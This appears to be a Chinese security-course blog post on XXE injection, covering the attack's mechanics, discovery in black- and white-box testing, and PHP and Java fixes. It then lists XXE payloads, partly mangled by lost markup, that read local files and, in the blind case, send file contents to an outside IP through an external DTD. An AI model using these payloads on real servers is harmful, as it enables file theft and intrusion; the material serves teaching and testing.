• day41WEB 攻防-通用漏洞&XML&XXE&无回显&DTD 实体&伪协议&代码审计

    本章知识点:
    1 XML&XXE- 原理 & 发现 & 利用 & 修复等
    2 XML&XXE- 黑盒模式下的发现与利用
    3 XML&XXE- 白盒模式下的审计与利用
    4 XML&XXE- 无回显 & 伪协议 & 产生层面
    配套资源(百度网盘) 
    1. 链接:https://pan.baidu.com/s/1TrPpubuF_Yqa4f12J-dljQ?pwd=8j7i 
    2. 提取码:8j7i

    XXE 黑盒发现:

    1 、获取得到 Content-Type 或数据类型为 xml 时,尝试进行 xml 语言 payload 进行
    测试
    2 、不管获取的 Content-Type 类型或数据传输类型,均可尝试修改后提交测试 xxe
    3 XXE 不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成
    文件中的 XXE Payload 被执行
    XXE 白盒发现:
    1 、可通过应用功能追踪代码定位审计
    2 、可通过脚本特定函数搜索定位审计
    3 、可通过伪协议玩法绕过相关修复等
    详细点:
    XML 被设计为传输和存储数据, XML 文档结构包括 XML 声明、 DTD 文档类型定义(可
    选)、文档元素,其焦点是数据的内容,其把数据从 HTML 分离,是独立于软件和硬件的
    信息传输工具。 XXE 漏洞全称 XML External Entity Injection ,即 xml 外部实体
    注入漏洞, XXE 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,导致
    可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
    XML HTML 的主要差异:
    XML 被设计为传输和存储数据,其焦点是数据的内容。
    HTML 被设计用来显示数据,其焦点是数据的外观。
    HTML 旨在显示信息 ,而 XML 旨在传输信息。
    XXE 修复防御方案:
    - 方案 1- 禁用外部实体
    PHP:
    libxml_disable_entity_loader(true);
    JAVA:
    DocumentBuilderFactory dbf
    =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferenc
    es(false);

    XML&XXE-黑盒-原理&探针&利用&玩法等

    参考:https://www.cnblogs.com/20175211lyz/p/11413335.html

    漏洞利用原理

    客户端:xml发送数据

    服务端:xml解析数据

    利用xml写一个带有文件读取的代码尝试发送,类似文件功能读取实现

    漏洞复现

    环境搭建(本地搭建)

    输入账号密码抓包分析
    通过抓包可以发现,客户端的数据是以xml的格式发送的,并且有回显,后端通过解析xml数据然后输出,利用xml写文件读取,再改包发送,因为有回显就可以获得文件的内容

    1、读取文件: 

    1. "1.0"?>
    2. Mikasa [
    3. test SYSTEM "file:///d:/e.txt">
    4. ]>
    5. <user><username>&test;username><password>Mikasapassword>
    6. r>
    再本地D盘新建e.txt文件,然后写入“成功获取”

    2、带外测试:

    文件读取的时候,如果没有数据回显,那么我们就无法判断是否有漏洞,通过带外测试可以判断漏洞是否存在,而且能向外发送数据  //dnslog.cn 
    1. "1.0" ?>
    2. test [
    3. file SYSTEM "http://9v57ll.dnslog.cn">
    4. %file;
    5. ]>
    6. <user><username>&send;username><password>Mikasapassword>
    7. r>

    3、外部引用实体 dtd

    1,解决拦截绕过问题
    2,解决诗句不回显问题 
    1. "1.0" ?>
    2. test [
    3. file SYSTEM "http://127.0.0.1:8081/evil2.dtd">
    4. %file;
    5. ]>
    6. <user><username>&send;username><password>Mikasapassword>
    7. r>
    8. evil2.dtd
    9. send SYSTEM "file:///d:/e.txt">

    4、无回显读文件                                                                                                    

    1. "1.0"?>
    2. ANY[
    3. file SYSTEM "file:///d:/e.txt">
    4. remote SYSTEM "http://47.94.236.117/test.dtd">
    5. %remote;
    6. %all;
    7. ]>
    8. <root>&send;root>
    9. test.dtd
    10. all "
    11. 'http://47.94.236.117/get.php?file=%file;'>">

    XML&XXE 前端 CTF& Jarvisoj& 探针 利用


    XML&XXE 白盒 CMS& PHPSHE& 无回显审计

  • 相关阅读:
    代码随想录-Day25
    c# npoi创建数据有效性约束制定列和单元格分别设置
    SpringBoot生产监控
    怎么手写转文字?借助这3款工具轻松实现
    vue3父子props 非props emit slot 具名/动态/作用域slot 动态/异步组件suspense $refs 生命周期
    【附源码】计算机毕业设计SSM手机测试管理系统
    Java 多线程(五):锁(三)
    【Python高级编程】pickle`文件处理:序列化与反序列化
    GitHub 官方大动作频频「GitHub 热点速览 v.22.24」
    Electron和vue3集成(可用于生产打包)
  • 原文地址:https://blog.csdn.net/m0_69583059/article/details/136215168